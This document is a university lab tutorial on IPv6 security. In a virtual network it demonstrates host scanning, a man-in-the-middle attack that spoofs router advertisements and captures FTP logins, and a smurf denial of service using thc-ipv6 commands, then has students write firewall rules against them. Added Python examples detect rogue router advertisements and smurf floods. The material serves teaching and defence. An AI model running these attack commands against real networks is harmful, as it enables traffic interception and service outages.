IPv6-based vulnerabilities

Authors: Mikhail Zolotukhin, Lauri Sormunen and Timo Hämäläinen

1. Introduction

The core protocol of the Internet, IPv4, has had its address space nearly exhausted since 2011. Because of this limited address space, the protocol can no longer support the growing number of devices connected to the Internet. Even though the successor protocol IPv6 was developed during the 1990s and has been supported by most networking devices for years, it still has not been widely adopted. From a security point of view, the lack of use and knowledge on the subject may leave undiscovered vulnerabilities in the firewalls of IPv6-enabled devices.

The remainder of this tutorial is organized as follows. Several preliminary tasks are presented in Section 2. Section 3 shows how to configure IPv6 for the virtual network established in the previous exercises. A few IPv6 attacks are demonstrated in Section 4. In Section 5, the firewall of the router is configured in such a way that the attacks can be mitigated or prevented. Section 6 concludes the tutorial.

This tutorial (including assignments) takes on average 7.81 hours to complete.

2. Preliminary questions

And now it does not...

05 Oct 23

I seem to be unable to access the "Survey on IPv6 Security Threats and Defense Mechanisms". Requires login via institution, but JYU is not on the list. EDIT: Works now

25 Sep 23 (edited 27 Sep 23)

Just buy the article, it's only 30 eur

Edit: added "ezproxy.jyu.fi" to the link, should work from outside of the jyu net now

05 Oct 23 (edited 05 Oct 23)

3. Preparing IPv6 network

  1. Start the following VMs: gateway, dnsserv, bob, webserv and kali. If you enabled access to the pfSense web configurator from the host machine as described in the first tutorial, you can reconfigure pfSense settings from the host; otherwise you will also need to start alice-VM.
  1. Most operating systems are configured by default to prefer IPv6 addresses and will assign them to interfaces when available. You can see the IPv6 address by typing the following in the terminal of one of your Ubuntu VMs, e.g. bob-VM:

    $ ifconfig

    If you don't have "ifconfig" tool, you can install it by typing:

    $ sudo apt install net-tools

    Information about the network interface will be printed out, for example:

    enp0s3      Link encap:Ethernet HWaddr 08:00:27:e7:52:3f
                inet addr:192.168.10.102 Bcast:192.168.10.255 Mask:255.255.255.0
                inet6 addr: fe80::a00:27ff:fee7:523f/64 Scope:Link

    The last line shows that interface enp0s3 has an IPv6 address whose scope is Link (more commonly called Link-Local). If the scope is Global and the prefix of the address is in 2000::/3, you most likely have a public IPv6 address, reachable from anywhere on the IPv6 Internet. In this exercise, we are going to use Unique Local Addresses (ULAs) within the prefix fc00::/7.

  1. In the pfSense web configurator, navigate to System -> Advanced. Click "Networking" in the upper part of the page. In "IPv6 Options", make sure that the checkbox "All IPv6 traffic will be blocked by the firewall unless this box is checked" is checked. Scroll down and save the changes.
  1. Assign IPv6 addresses to the OPT1 and OPT2 interfaces of the gateway. In the pfSense web configurator, go to Interfaces -> OPT1. Set "IPv6 Configuration Type" to "Static IPv6". Scroll down and, in the Static IPv6 Configuration section, set "IPv6 address" to "fc00::1:0:0:0:1" and the mask to "64". Save and apply the settings.

    Go to Interfaces -> OPT2. Set "IPv6 Configuration Type" to "Static IPv6". Scroll down and in Static IPv6 Configuration section set "IPv6 address" to "fc00::2:0:0:0:1" and mask to "64". Save and apply the settings.

  1. Next, we enable DHCPv6 so that dual-stacked DHCP clients in our virtual network obtain IPv6 addresses automatically. This is done by navigating to Services -> DHCPv6 Server & RA; for the OPT1 interface, check "Enable DHCPv6 server on interface OPT1" and set the "from" and "to" fields of Range to "fc00:0:0:1::" and "fc00::1:ffff:ffff:ffff:ffff", respectively. Make sure there are no extra spaces, otherwise the values will not be accepted by pfSense. Click "Save".

    Switch to the OPT2 interface, check "Enable DHCPv6 server on interface OPT2" and set the "from" and "to" fields of Range to "fc00:0:0:2::" and "fc00::2:ffff:ffff:ffff:ffff", respectively. Make sure there are no extra spaces, otherwise the values will not be accepted by pfSense. Click "Save".

  1. We have to move bob-VM to the OPT2 subnet. To do so, on bob-VM, open the netplan configuration file:

    $ sudo nano /etc/netplan/01-network-manager-all.yaml

    edit it as follows:

    network:
      version: 2
      ethernets:
        enp0s3:
          dhcp4: no
          addresses: [192.168.12.102/24]
          gateway4: 192.168.12.1
          nameservers:
            addresses: [8.8.8.8, 8.8.4.4]

    then execute:

    $ sudo netplan apply

    Shut bob-VM down. After that, select bob-VM in VirtualBox Manager, go to Settings -> Network -> Adapter 1 and change its internal network from "lan" to "opt2". Click OK and start the VM. Once it has started, check its network interface:

    $ ifconfig enp0s3

    There should be an IPv6 address with global scope and mask 64. Also check that you still have access to the Internet by pinging some external host.

  1. On webserv-VM and kali-VM, type

    $ ifconfig

    and make sure that the primary interfaces of these VMs also have IPv6 addresses with mask 64 and global scope. If an fc00-prefixed address is not available on one of the machines, restart it.

I have double-checked every step and rebooted all machines, but there are still no fc00-prefixed addresses.

EDIT: Somehow it didn't work to use the pfSense web configurator on the host machine. I had to do it via alice-VM.

22 Sep 23 (edited 22 Sep 23)

this does not sound like a correct statement, but ok :)

29 Sep 23
  1. We now need to install an FTP server on our webserv-VM and an FTP client on the bob-VM. First, type in the web server's terminal:

    $ sudo apt install vsftpd -y

    If this fails, try to run

    $ sudo apt update

    to update the package manager lists, and then repeat the previous command.

    Now, verify that the server is running in IPv6 enabled mode. Open the configuration file in nano:

    $ sudo nano /etc/vsftpd.conf

    Check that the following settings are present and not commented out with "#"; if not, add or uncomment them:

    listen=NO
    ...
    listen_ipv6=YES
    ...
    anonymous_enable=NO
    ...
    local_enable=YES
    ...
    write_enable=YES

    Save the file and restart the FTP server:

    $ sudo systemctl restart vsftpd

    You can check that the server is listening by executing

    $ sudo netstat -ln6 | grep 21

    and checking if the output includes the line

    tcp6    0   0 :::21         :::*        LISTEN
  1. Edit your firewall rules for the OPT2 subnet to allow IPv6 traffic from bob-VM to webserv-VM. The easiest way is to change the address family of your OPT2 net "pass all" rule (action: pass, source: OPT2 net, destination: any, protocol: any) from "IPv4" to "IPv4+IPv6". Modify this rule as instructed. This rule (or rather its IPv6 part) is one of the rules required in the advanced assignment, so do not make mistakes here.

    Just to clarify: when using "IPv4+IPv6", pfSense generates two rules, one for IPv4 and one for IPv6. In this assignment we are only interested in the IPv6 part of the rule. Keep this in mind when using pfctl to print the rules.

  1. Install FTP client on bob-VM:

    $ sudo apt install lftp -y

    Check that you can connect to the FTP server and execute commands (you can find "webserv-ipv6-global-scope-address" by running "ifconfig" on webserv-VM):

    $ lftp <webserv-ipv6-global-scope-address>
    ~> user webserv
    Pass: <Enter webserv>

    Once connected, type e.g. "ls" to list the files in the home directory, or some other commands. Make sure that everything is working properly before moving to the next section, e.g. that typing "ls" shows the list of files on the server. Once you have checked that you can execute commands via FTP from bob-VM, type exit.

4. Attacks against IPv6 networks

4.1 Scanning hosts

  1. Deploying IPv6 gives each subnet a large address space, since most network prefixes have a length of 64 bits. The 64 least significant bits are left as interface IDs for the devices in the network, which theoretically allows \(2^{64}\) addresses for different devices. Provided that device addresses are not assigned in numerical order, the network becomes too large to scan from the outside.

    However, there are methods of scanning a network from the inside using the all-nodes multicast address, ff02::1. This can be done simply by pinging that address. In kali-VM's terminal, run:

    $ ping6 ff02::1%eth0

    where eth0 is the interface of kali-VM connected to OPT2. Note that many network tools have an IPv6 version, either as a separate program or via a "-6" argument. When using link-local multicast or Link-Local addresses, you have to specify the network interface; otherwise the OS cannot know which link you are referring to.

  1. On kali-VM, run:

    $ sudo atk6-alive6 eth0 -v

    to print the Link-Local IPv6 addresses of the hosts in OPT2 (replace eth0 with the actual interface name, if necessary). If the package is missing, you can install it as follows:

    $ sudo apt -o Acquire::ForceIPv4=true install thc-ipv6

    View the neighbouring hosts and their roles:

    $ ip -6 neigh

    and find the address that is marked as a router. If there is none, you have probably done something wrong. Double-check all the previous steps.
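As an added example (not part of the original tutorial), the following Python script derives the modified EUI-64 interface identifier from a MAC address, reproducing the fe80::a00:27ff:fee7:523f address shown for MAC 08:00:27:e7:52:3f in Section 3, and parses `ip -6 neigh` output to pick out the router entries and to flag hosts whose addresses embed their MAC and are therefore guessable despite the 2^64 space. The neighbour table it parses is constructed sample data; only the gateway's OPT2 link-local address is taken from the tutorial.

```python
import ipaddress
import re

# Constructed `ip -6 neigh` output for kali-VM (eth0 = OPT2, eth1 = OPT1); not a capture from the page.
# The first address is the gateway's OPT2 link-local address quoted in the tutorial; the rest are made up.
NEIGH_OUTPUT = """\
fe80::a00:27ff:fea9:31ba dev eth0 lladdr 08:00:27:a9:31:ba router REACHABLE
fe80::a00:27ff:fee7:523f dev eth0 lladdr 08:00:27:e7:52:3f STALE
fc00::2:a00:27ff:fee7:523f dev eth0 lladdr 08:00:27:e7:52:3f STALE
fc00::2:3c1d:9e4b:7a20:11f5 dev eth0 lladdr 08:00:27:12:34:56 REACHABLE
fe80::a00:27ff:fe11:2233 dev eth1 lladdr 08:00:27:11:22:33 router DELAY
"""

def eui64_iid(mac: str) -> int:
    """Modified EUI-64 interface identifier derived from a 48-bit MAC (RFC 4291, Appendix A)."""
    raw = bytes.fromhex(mac.replace(":", "").replace("-", ""))
    if len(raw) != 6:
        raise ValueError("expected a 48-bit MAC address")
    raw = raw[:3] + b"\xff\xfe" + raw[3:]          # insert FF:FE between the OUI and the NIC part
    raw = bytes([raw[0] ^ 0x02]) + raw[1:]         # flip the universal/local bit
    return int.from_bytes(raw, "big")

def slaac_address(prefix: str, mac: str) -> ipaddress.IPv6Address:
    """Address a host auto-configures in a /64 prefix when its interface ID is EUI-64 based."""
    net = ipaddress.IPv6Network(prefix, strict=False)
    if net.prefixlen != 64:
        raise ValueError("SLAAC needs a /64 prefix")
    return ipaddress.IPv6Address(int(net.network_address) | eui64_iid(mac))

NEIGH_LINE = re.compile(r"^(\S+) dev (\S+) lladdr (\S+)( router)?")

def parse_neighbors(text: str) -> list:
    """Parse `ip -6 neigh` lines; mark routers and addresses whose interface ID embeds the MAC."""
    entries = []
    for line in text.splitlines():
        m = NEIGH_LINE.match(line)
        if not m:
            continue
        addr, dev, mac, router = m.groups()
        ip = ipaddress.IPv6Address(addr)
        entries.append({
            "addr": ip, "dev": dev, "mac": mac,
            "router": router is not None,
            "eui64": (int(ip) & ((1 << 64) - 1)) == eui64_iid(mac),
        })
    return entries

def routers(entries: list) -> dict:
    """Map interface name -> link-local address of the router seen on it (what the tips above look for)."""
    return {e["dev"]: e["addr"] for e in entries if e["router"]}

def predictable_hosts(entries: list) -> list:
    """Non-link-local addresses whose interface ID is derived from the MAC, i.e. guessable from the vendor OUI."""
    return [e["addr"] for e in entries if e["eui64"] and not e["addr"].is_link_local]

if __name__ == "__main__":
    table = parse_neighbors(NEIGH_OUTPUT)
    print("routers:", routers(table))
    print("EUI-64 based addresses:", predictable_hosts(table))
```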

4.2 Man-In-The-Middle

  1. IPv6 allows any device in the network to advertise itself as a router by multicasting router advertisements (RA). In this tutorial, we are going to advertise kali-VM as a router. For this purpose, on kali-VM, open the network configuration file:

    $ sudo nano /etc/network/interfaces

    and add one more interface by adding the following lines at the end of the file:

    auto eth1
    iface eth1 inet static
    address 192.168.11.102
    netmask 255.255.255.0
    gateway 192.168.11.1

    Shut down kali-VM.

  1. We need to add another network interface to kali-VM. To do so, in VirtualBox Manager, select "kali", go to Settings -> Network -> Adapter 2. Enable it, attach the adapter to an internal network, and choose "opt1" as the name of the network.

    Now you can boot kali-VM. Once it is up, check its network interfaces:

    $ ifconfig

    There should be an IPv6 address with global scope and mask 64 on both "eth0" and "eth1". Also check that you still have access to the Internet by pinging some external host.

  1. On bob-VM, check webserv-VM's IPv6 address with global scope and start pinging this address:

    $ ping6 <webserv-global-scope-address>

    e.g. in my case the command looked like

    $ ping6 fc00::1:a00:27ff:fefa:e86f

    It should work. Let it run.

  1. From kali-VM, find out the link-local address of OPT2 interface of the router:

    $ sudo atk6-alive6 eth0 -v

    and then

    $ ip -6 neigh
  1. From kali-VM, start sending router advertisements with a router lifetime of 0 by running the following command:

    $ sudo atk6-kill_router6 eth0 <router-opt2-link-local-address>

    e.g. in my case, the command looked as follows:

    $ sudo atk6-kill_router6 eth0 fe80::a00:27ff:fea9:31ba

    The address in your case is obviously different.

Tip: this router opt2 address can be obtained from the list returned by the previous command, i.e. "ip -6 neigh"; the line you are interested in contains "eth0" and "router"

17 Oct 23 (edited 17 Oct 23)
  1. Open one more terminal on kali-VM and find out the link-local addresses of OPT1 interface of the router:

    $ sudo atk6-alive6 eth1 -v

    and then

    $ ip -6 neigh

    Eliminate this router interface too, so that kali-VM can later receive traffic from both directions:

    $ sudo atk6-kill_router6 eth1 <router-opt1-link-local-address>

Tip: similarly, the router opt1 address can also be obtained from the list returned by command "ip -6 neigh", but this time the line you are interested in contains "eth1" and "router"

17 Oct 23 (edited 17 Oct 23)
  1. Open one more terminal on kali-VM. First, we enable IPv6 forwarding on kali-VM:

    $ sudo sysctl -w net.ipv6.conf.all.forwarding=1

    and add a new route for each interface:

    $ sudo ip route add fc00:0:0:2::/64 dev eth0
    $ sudo ip route add fc00:0:0:1::/64 dev eth1
  1. Then, we start multicasting router advertisements from kali-VM:

    $ sudo atk6-fake_router26 -A fc00:0:0:2::/64 -a 30 eth0

    and in another terminal

    $ sudo atk6-fake_router26 -A fc00:0:0:1::/64 -a 30 eth1
  1. Open Wireshark in another terminal on kali-VM:

    $ sudo wireshark

    and start capturing traffic on eth0, i.e. the first interface connected to OPT2.

  1. Go back to bob-VM, make sure that pinging still works and stop it. Then, connect to the FTP server using the FTP client software:

    $ lftp <webserv-ipv6-global-scope-address>
    ~> user webserv
    Pass: <Enter webserv>

    As previously, you can check "webserv-ipv6-global-scope-address" by running "ifconfig enp0s3" on webserv. Enter some commands in the FTP client, e.g. list directories "ls", or download a file using "get" command.

    Once you have logged in using FTP and run a couple of commands, stop capturing packets in Wireshark on kali-VM. Save the resulting capture file as we will need it later during the assignment.

  1. Stop all the processes running in kali-VM's terminals.
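Added example, not code from the tutorial or from the thc-ipv6 suite: a minimal ICMPv6 Router Advertisement parser and classifier of the kind an RA monitor on the OPT2 link could use to spot the two patterns used above, a lifetime-0 advertisement spoofed from the real gateway (the kill_router6 step) and an advertisement from an unexpected source (the fake_router26 step). The packets are constructed inside the script, the ICMPv6 checksum is neither computed nor verified, and the authorised-router set holding the gateway's link-local address quoted in the tutorial is an assumption.

```python
import ipaddress
import struct

# Link-local address of the OPT2 gateway interface quoted in the tutorial: the only router expected on eth0.
AUTHORIZED_ROUTERS = {ipaddress.IPv6Address("fe80::a00:27ff:fea9:31ba")}
ALL_NODES = ipaddress.IPv6Address("ff02::1")

def build_ra(src: str, router_lifetime: int, prefix: str = None, hop_limit: int = 255) -> bytes:
    """Constructed IPv6 packet carrying an ICMPv6 Router Advertisement (checksum left as zero)."""
    # type 134, code 0, checksum, cur hop limit, flags, router lifetime, reachable time, retrans timer
    body = struct.pack("!BBHBBHII", 134, 0, 0, 64, 0, router_lifetime, 0, 0)
    if prefix:
        net = ipaddress.IPv6Network(prefix)
        # Prefix Information option: type 3, length 4 (32 bytes), L+A flags, valid/preferred lifetimes
        body += struct.pack("!BBBBIII", 3, 4, net.prefixlen, 0xC0, 2592000, 604800, 0) + net.network_address.packed
    header = struct.pack("!IHBB", 0x60000000, len(body), 58, hop_limit)   # version 6, payload len, NH=ICMPv6
    return header + ipaddress.IPv6Address(src).packed + ALL_NODES.packed + body

def parse_ra(pkt: bytes):
    """Return source, hop limit, router lifetime and advertised prefixes of an RA, or None if not an RA."""
    if len(pkt) < 56 or pkt[0] >> 4 != 6 or pkt[6] != 58 or pkt[40] != 134:
        return None
    lifetime = struct.unpack("!H", pkt[46:48])[0]
    prefixes, off = [], 56
    while off + 2 <= len(pkt):                       # walk the TLV options after the 16-byte RA body
        otype, olen = pkt[off], pkt[off + 1] * 8
        if olen == 0 or off + olen > len(pkt):       # zero-length or truncated option: stop parsing
            break
        if otype == 3 and olen == 32:
            prefixes.append(f"{ipaddress.IPv6Address(pkt[off + 16:off + 32])}/{pkt[off + 2]}")
        off += olen
    return {"src": ipaddress.IPv6Address(pkt[8:24]), "hop_limit": pkt[7],
            "lifetime": lifetime, "prefixes": prefixes}

def classify_ra(pkt: bytes, authorized=AUTHORIZED_ROUTERS) -> str:
    """Label an RA the way an RA-Guard style monitor on the OPT2 link would."""
    ra = parse_ra(pkt)
    if ra is None:
        return "not-ra"
    if ra["hop_limit"] != 255:                       # RFC 4861: RAs must arrive with hop limit 255
        return "invalid"
    if ra["src"] not in authorized:                  # fake_router26 pattern: unexpected router source
        return "rogue"
    if ra["lifetime"] == 0:                          # kill_router6 pattern: lifetime 0 sent as the real router
        return "withdrawal"
    return "ok"

if __name__ == "__main__":
    print(classify_ra(build_ra("fe80::a00:27ff:fea9:31ba", 0)))                       # withdrawal
    print(classify_ra(build_ra("fe80::a00:27ff:fe00:beef", 30, "fc00:0:0:2::/64")))   # rogue
```

A "withdrawal" from a gateway that is still up is exactly the kill_router6 signature, so the label should be correlated with the gateway's actual state rather than trusted on its own.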

4.3 Denial-of-Service

  1. There are numerous options for Denial-of-Service attacks on IPv6. The large address space of IPv6 means more devices can be used in distributed denial of service (DDoS) attacks. A common way of executing a denial of service attack is to bombard the target with ICMP messages. Because ICMP is stateless, replies are generally accepted even if no request was initially made. The most common ICMP messages are generated by simple pinging. A smurf attack is a DDoS attack in which the source address of a ping is forged and the forged requests are sent to multiple nodes of the network. The nodes respond to the target node, effectively saturating the target's network interface and loading up its CPU.

    In this section, we demonstrate the IPv6 version of a DDoS attack in our OPT2 network. To monitor performance, first start pinging the gateway from bob-VM:

    $ ping6 fc00:0:0:2::1 -i 3

    The response times should mostly be less than 1 ms. Furthermore, go to the pfSense's web configurator, select Status -> Traffic Graph and choose interface OPT2 to start monitoring traffic on that interface.

Had to reboot Bob-VM to get this ping to work after previous.

22 Sep 23
  1. Now, we can start the attack from kali-VM's terminal against the gateway's interface with address fc00:0:0:2::1:

    $ sudo atk6-smurf6 eth0 fc00:0:0:2::1 ff02::1/64

    This causes all the nodes in OPT2 to send ICMP replies to the router, even if it did not send any requests.

  1. After that, the response times shown by the ping running on bob-VM should change significantly. Try to access the bank web site from bob-VM's browser:

    192.168.11.2/accounts 

    The page might become unavailable.

    You can take a screenshot of a few lines of the ping output logs with reply times obtained from bob-VM during the attack. Also, take a screenshot of the traffic graph from pfSense's web configurator, in which the attack is clearly visible.

    The attack may be so powerful that pfSense becomes unresponsive and will not update the traffic graph. If this is the case, stop the attack by pressing Ctrl+C in the kali-VM terminal where the smurf command is running. This gives the gateway some breathing room and it should plot the graph. In this case, take the screenshot once the graph has updated, i.e. immediately after the attack has been stopped.
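Added example, not from the tutorial: detection logic for the smurf pattern described above, run over a constructed list of ICMPv6 echo events as a sensor on the OPT2 link might log them. It flags a host that receives many echo replies it never requested, treating echo requests sent to multicast groups as never legitimising the replies they trigger. Apart from the gateway's fc00:0:0:2::1, all addresses are made up.

```python
import ipaddress
from collections import defaultdict

# Constructed ICMPv6 echo events (not a real capture):
# (time_s, src, dst, icmp_type, identifier, sequence); type 128 = echo request, 129 = echo reply.
GATEWAY = "fc00:0:0:2::1"                      # pfSense OPT2 address from the tutorial
BOB = "fc00::2:a00:27ff:fee7:523f"             # made-up global address for bob-VM
EVENTS = [
    (0.000, BOB, GATEWAY, 128, 0x1234, 1),     # bob's normal ping to the gateway ...
    (0.001, GATEWAY, BOB, 129, 0x1234, 1),     # ... and the gateway's reply
    (1.000, GATEWAY, "ff02::1", 128, 0x0001, 1),   # request to all-nodes with the gateway forged as source
] + [
    # every node on the link answers the forged request, so the gateway is flooded with replies
    (1.0 + i * 0.001, f"fc00:0:0:2::10{i:02x}", GATEWAY, 129, 0x0001, 1) for i in range(50)
]

def detect_smurf(events, window: float = 1.0, threshold: int = 10) -> dict:
    """Return {target: peak count} for hosts that receive >= threshold echo replies they never
    asked for within `window` seconds. Requests to multicast destinations never count as asking,
    because reflecting multicast replies onto a forged source is what a smurf does."""
    solicited = set()                     # (requester, id, seq) seen leaving the requester
    pending = defaultdict(list)           # target -> timestamps of unsolicited replies in the window
    alerts = {}
    for t, src, dst, icmp_type, ident, seq in sorted(events, key=lambda e: e[0]):
        if icmp_type == 128:
            if not ipaddress.IPv6Address(dst).is_multicast:
                solicited.add((src, ident, seq))
        elif icmp_type == 129 and (dst, ident, seq) not in solicited:
            ts = pending[dst]
            ts.append(t)
            while ts and t - ts[0] > window:   # slide the window forward
                ts.pop(0)
            if len(ts) >= threshold:
                alerts[dst] = max(alerts.get(dst, 0), len(ts))
    return alerts

def multicast_requests(events) -> dict:
    """Count echo requests sent to multicast groups per claimed source: the smurf trigger itself."""
    counts = defaultdict(int)
    for _t, src, dst, icmp_type, _ident, _seq in events:
        if icmp_type == 128 and ipaddress.IPv6Address(dst).is_multicast:
            counts[src] += 1
    return dict(counts)

if __name__ == "__main__":
    print("flooded targets:", detect_smurf(EVENTS))
    print("multicast echo requests by claimed source:", multicast_requests(EVENTS))
```

A legitimate `ping6 ff02::1` from a single host also produces unsolicited replies, but only one per node, so on a small link it stays below the threshold while a continuous smurf6 run does not.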

5. Assignments

5.1 Preliminary

Complete the test below based on the preliminary questions (1 point).


5.2 Basic

Complete the test below based on the tutorial results (1.0 points):


Highly possible that I just don't get something, but this description seems quite unclear. Which command "marks" ... is it meant that this command sets a device with a certain IP address to act as the router?

19 Oct 23

highlights

19 Oct 23

Find information in the Internet about IPv6 address allocation and complete the test below (0.5 points).


What can be simple protection mechanisms against the attacks described in the tutorial? Complete the test below devoted to the attack countermeasures (0.5 points).


5.3 Advanced

Implement several rules in the pfSense firewall to manage IPv6 traffic in your virtual network. The rules should be implemented in subnets OPT1 and OPT2 using the IPv6 address family exclusively.

For OPT1 subnet, implement the following 2 rules:

  • ICMPv6 messages to OPT2 from OPT1 should be blocked
  • The rest of IPv6 traffic from OPT1 should be allowed

For OPT2 subnet, implement the following 9 rules:

  • Web server should be accessible using TCP over IPv6 via HTTP, HTTPS and FTP ports from any host of OPT2 subnet
  • Web server should be accessible using TCP over IPv6 via SSH only from bob-VM
  • Other IPv6 traffic to the web server from other OPT2 hosts should be blocked
  • Web interface of pfSense should be accessible using TCP over IPv6 via HTTPS only from bob-VM
  • Any other IPv6 traffic from OPT2 to pfSense's OPT2 address should be blocked
  • ICMPv6 messages to OPT1 from OPT2 should be blocked
  • The rest of IPv6 traffic from OPT2 should be allowed

Tips:

  • Use global scope IP addresses for the webserv and bob
  • For the gateway use the IPv6 address from OPT2 net, i.e. "OPT2 address" (fc00:0:0:2::1)

You can test your rules by running "nmap -6 <target ipv6 address> -p <port list>" from different VMs in the network.

Also, remember that during the tutorial we have added kali-VM to OPT1 subnet, which might cause confusion during the rule tests. Thus, it is recommended to disable the second interface on kali-VM that corresponds to OPT1 subnet.

When creating the rules, use some distinctive identifiers for the description, e.g. "ipv6 opt1" and "ipv6 opt2" so that you can easily extract these rules using pfctl in the pfSense shell as it has been done in one of the previous assignments. As previously, the pfSense's network interface names are assumed to be "em2" and "em3". Subnet IPv6 addresses are expected to correspond to the ones configured in the tutorial, i.e. fc00:0:0:1::/64 and fc00:0:0:2::/64.

Print your rules with pfctl and copy-paste them in the correct order (i.e. in the same order as they are shown in the rule tables) to the corresponding answer boxes below. Separate the rules from each other with an empty line.

OPT1 IPv6 rules (2 rules, 0.4 points)


OPT2 IPv6 rules (9 rules, 1.6 points)


Points 0.4 / 1.6, but the nmap check from bob and kali gives the states as required. Any hint what might be wrong?

05 Oct 23

Two of your block rules are identical; the grading script has a hard time understanding what you are doing there...

11 Oct 23

5.4 General comments and feedback

Let us know how many hours in total you have spent on this assignment:


On a scale from 1 to 10, estimate how interesting and difficult the tutorial was:


You can also give us some general feedback:


6. Conclusion

This tutorial briefly overviews a few common attacks against an IPv6 network. While the large address space can restore end-to-end connectivity on the Internet, it also exposes more devices to attack attempts. While the number of devices on the IPv6 Internet is growing rapidly, older devices may still have implementation flaws because of the long transition period. IPv6 may also be enabled on many devices without being actively monitored.

More information on the topic can be found at:

IPv6 basics link does not work

15 Oct 23

thanks, fixed

16 Oct 23
